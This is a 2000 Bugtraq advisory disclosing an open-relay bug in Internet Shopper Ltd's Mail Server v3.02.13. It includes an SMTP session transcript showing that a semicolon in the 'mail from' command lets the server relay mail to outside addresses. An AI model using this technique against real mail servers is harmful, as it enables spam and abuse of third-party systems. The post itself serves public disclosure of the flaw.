[16801] in bugtraq
Internet Shopper Ltd's Mail Server Open relay bug.
daemon@ATHENA.MIT.EDU (Imran Ghory)
Mon Sep 18 00:53:32 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Message-Id: <39C2897F.21917.2F4CD7@localhost>
Date: Fri, 15 Sep 2000 20:41:35 +0100
Reply-To: Imran Ghory <ImranG@BTINTERNET.COM>
From: Imran Ghory <ImranG@BTINTERNET.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Internet Shopper Ltd's Mail Server Open relay bug.
(I have been unable to make contact with Internet Shopper Ltd, and
as this bug might easily be found accidently I have decide to make
it public)
SUMMARY:
Internet Shopper Ltd's Mail Server can be made to accept and
handle mail for non-local sites.
DETAILS:
Version involved:
Internet Shopper Ltd's Mail Server v3.02.13
No other versions have been tested.
Exploit:
The use of the semi-colon in the "mail from" command will allow
mail to be sent to machine that aren't local.
Exploit in action:
220 mailsvr.xxxxxxxxxx.ac.uk WindowsNT SMTP Server
v3.02.13/32.aap3 ready at Wed, 13 Sep 2000 21:03:39 +0100
helo me
250 mailsvr.xxxxxxxxxx.ac.uk me
mail from;
250 Ok.
rcpt to: ImranG@btinternet.com
250 Ok.
data
354 Start mail input, end with <CRLF>.<CRLF>.
Test data
.
250 Requested mail action Ok.
quit
221 Goodbye me
Fix:
None known at this time.
Imran Ghory
